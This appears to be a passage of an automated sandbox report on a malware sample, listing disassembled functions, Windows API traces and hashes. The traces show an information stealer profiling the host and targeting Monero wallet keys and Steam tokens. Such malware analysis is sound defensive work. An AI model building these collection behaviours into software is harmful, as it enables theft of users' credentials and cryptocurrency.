Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 5831d203eb0ca819a36e8175d7996c34649c19d3a9e9bdd5f4a08913d5d08bae
Instruction ID: 515103ffc67ac00eb90f6970282f696960e048bd63e495b89cde3998479cfbe9
Opcode Fuzzy Hash: 5831d203eb0ca819a36e8175d7996c34649c19d3a9e9bdd5f4a08913d5d08bae
Instruction Fuzzy Hash: 7A816675A102099FCF18EF68D991AEDB7F5FF94300F508569E8099F251DB30AA06CBD2

Function 00B970D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

memset.MSVCRT ref: 00B9716A

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00B9718C

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-4138519520
Opcode ID: cfe88528d6f1041b6e8c26cee661ad5bc89c744536e3ae08eb3aa5e61f6c8570
Instruction ID: d3fbc19ece9ecdb4680ed2fe49d2c40a5905f48a8af807522599baac47c633fb
Opcode Fuzzy Hash: cfe88528d6f1041b6e8c26cee661ad5bc89c744536e3ae08eb3aa5e61f6c8570
Instruction Fuzzy Hash: F5515AB0D642189BDF14EB90DC85BEEB3F4AB55304F2040E8E20576182EF746E88CF69

Function 00B99470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B99484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00B994A5
CloseHandle.KERNEL32(00000000), ref: 00B994AF

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: b5330a7d2893d2db6dfb75901aaa077a1a790119a46d84b0a43b338c3d905381
Instruction ID: 5a736af3a958eb4f552b9d6e45c94dbfee0e148fe8d0be5459728ee1c83ba7fe
Opcode Fuzzy Hash: b5330a7d2893d2db6dfb75901aaa077a1a790119a46d84b0a43b338c3d905381
Instruction Fuzzy Hash: 6FF03A7490020DEBDB15DFA8DC4AFED77B8EB08304F004598BA0997290D6B46E85CB91

Function 00B81110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B8112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00B81132
ExitProcess.KERNEL32 ref: 00B81143

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 304922b2a9a0a174ce49b2a6110ec67ecd684d4afbaadbe538655329bf2366b1
Instruction ID: ea4334d681319b05c876a5fb6ffed1308e98b3dbb941d60b1c57e0dbbbd8513f
Opcode Fuzzy Hash: 304922b2a9a0a174ce49b2a6110ec67ecd684d4afbaadbe538655329bf2366b1
Instruction Fuzzy Hash: 96E0E67094630EFBE7107BA89C0EF0976BCEF04B05F204594F709B62D0D6B52A4197A9

Function 00B91A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B97500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B97542
Part of subcall function 00B97500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B9757F
Part of subcall function 00B97500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97603
Part of subcall function 00B97500: RtlAllocateHeap.NTDLL(00000000), ref: 00B9760A

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B97690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B976A4
Part of subcall function 00B97690: RtlAllocateHeap.NTDLL(00000000), ref: 00B976AB

Part of subcall function 00B977C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,00B9DBC0,000000FF,?,00B91C99,00000000,?,0133D900,00000000,?), ref: 00B977F2
Part of subcall function 00B977C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,00B9DBC0,000000FF,?,00B91C99,00000000,?,0133D900,00000000,?), ref: 00B977F9

Part of subcall function 00B97850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B811B7), ref: 00B97880
Part of subcall function 00B97850: RtlAllocateHeap.NTDLL(00000000), ref: 00B97887
Part of subcall function 00B97850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B9789F

Part of subcall function 00B978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97910
Part of subcall function 00B978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B97917
Part of subcall function 00B978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B9792F

Part of subcall function 00B97980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BA0E00,00000000,?), ref: 00B979B0
Part of subcall function 00B97980: RtlAllocateHeap.NTDLL(00000000), ref: 00B979B7
Part of subcall function 00B97980: GetLocalTime.KERNEL32(?,?,?,?,?,00BA0E00,00000000,?), ref: 00B979C4
Part of subcall function 00B97980: wsprintfA.USER32 ref: 00B979F3

Part of subcall function 00B97A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0133E2B0,00000000,?,00BA0E10,00000000,?,00000000,00000000), ref: 00B97A63
Part of subcall function 00B97A30: RtlAllocateHeap.NTDLL(00000000), ref: 00B97A6A
Part of subcall function 00B97A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0133E2B0,00000000,?,00BA0E10,00000000,?,00000000,00000000,?), ref: 00B97A7D

Part of subcall function 00B97B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0133E2B0,00000000,?,00BA0E10,00000000,?,00000000,00000000), ref: 00B97B35

Part of subcall function 00B97B90: GetKeyboardLayoutList.USER32(00000000,00000000,00BA05AF), ref: 00B97BE1
Part of subcall function 00B97B90: LocalAlloc.KERNEL32(00000040,?), ref: 00B97BF9
Part of subcall function 00B97B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00B97C0D
Part of subcall function 00B97B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B97C62
Part of subcall function 00B97B90: LocalFree.KERNEL32(00000000), ref: 00B97D22

Part of subcall function 00B97D80: GetSystemPowerStatus.KERNEL32(?), ref: 00B97DAD

GetCurrentProcessId.KERNEL32(00000000,?,0133D680,00000000,?,00BA0E24,00000000,?,00000000,00000000,?,0133E148,00000000,?,00BA0E20,00000000), ref: 00B9207E

Part of subcall function 00B99470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00B99484
Part of subcall function 00B99470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00B994A5
Part of subcall function 00B99470: CloseHandle.KERNEL32(00000000), ref: 00B994AF

Part of subcall function 00B97E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97E37
Part of subcall function 00B97E00: RtlAllocateHeap.NTDLL(00000000), ref: 00B97E3E
Part of subcall function 00B97E00: RegOpenKeyExA.KERNEL32(80000002,0132C428,00000000,00020119,?), ref: 00B97E5E
Part of subcall function 00B97E00: RegQueryValueExA.KERNEL32(?,0133D620,00000000,00000000,000000FF,000000FF), ref: 00B97E7F
Part of subcall function 00B97E00: RegCloseKey.ADVAPI32(?), ref: 00B97E92

Part of subcall function 00B97F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00B97FC9
Part of subcall function 00B97F60: GetLastError.KERNEL32 ref: 00B97FD8

Part of subcall function 00B97ED0: GetSystemInfo.KERNEL32(00BA0E2C), ref: 00B97F00
Part of subcall function 00B97ED0: wsprintfA.USER32 ref: 00B97F16

Part of subcall function 00B98100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0133E2F8,00000000,?,00BA0E2C,00000000,?,00000000), ref: 00B98130
Part of subcall function 00B98100: RtlAllocateHeap.NTDLL(00000000), ref: 00B98137
Part of subcall function 00B98100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B98158
Part of subcall function 00B98100: wsprintfA.USER32 ref: 00B981AC

Part of subcall function 00B987C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BA0E28,00000000,?), ref: 00B9882F
Part of subcall function 00B987C0: RtlAllocateHeap.NTDLL(00000000), ref: 00B98836
Part of subcall function 00B987C0: wsprintfA.USER32 ref: 00B98850

Part of subcall function 00B98320: RegOpenKeyExA.KERNEL32(00000000,0133B1A8,00000000,00020019,00000000,00BA05B6), ref: 00B983A4

Part of subcall function 00B98320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B98426
Part of subcall function 00B98320: wsprintfA.USER32 ref: 00B98459
Part of subcall function 00B98320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00B9847B
Part of subcall function 00B98320: RegCloseKey.ADVAPI32(00000000), ref: 00B9848C
Part of subcall function 00B98320: RegCloseKey.ADVAPI32(00000000), ref: 00B98499

Part of subcall function 00B98680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BA05B7), ref: 00B986CA
Part of subcall function 00B98680: Process32First.KERNEL32(?,00000128), ref: 00B986DE
Part of subcall function 00B98680: Process32Next.KERNEL32(?,00000128), ref: 00B986F3
Part of subcall function 00B98680: CloseHandle.KERNEL32(?), ref: 00B98761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00B9265B

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: 30d04cda99aad00bcfd9606d94a3e00fa4e95e2c3e431ef774ca1dca475488d8
Instruction ID: 4f0f7d44d6f095b6c8c2c255da828e9bb0ec922ecdce2710d3310fce47e1aa90
Opcode Fuzzy Hash: 30d04cda99aad00bcfd9606d94a3e00fa4e95e2c3e431ef774ca1dca475488d8
Instruction Fuzzy Hash: 00721D72C20119AADF19FBA0DC92DEE73BCAF55300F5542F9B51672091EF302B49CAA5

Function 00B86D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669432f8e307768f7f71af65375d816dd851352a34c9934cef1f80c7282e6ca7
Instruction ID: aacace3f3cd9342b6a8170a98887672fbc072cdaf2c620f05ac7798eef1ccf12
Opcode Fuzzy Hash: 669432f8e307768f7f71af65375d816dd851352a34c9934cef1f80c7282e6ca7
Instruction Fuzzy Hash: BE6105B4900219DBCB14EF94E988BEEB7F0FB08304F108599E519AB290D735EE94DF91

Function 00B95100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A820: lstrlen.KERNEL32(00B84F05,?,?,00B84F05,00BA0DDE), ref: 00B9A82B
Part of subcall function 00B9A820: lstrcpy.KERNEL32(00BA0DDE,00000000), ref: 00B9A885

lstrlen.KERNEL32(00000000,00000000,00BA0ACA), ref: 00B9512A

Strings

steam_tokens.txt, xrefs: 00B9513F

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
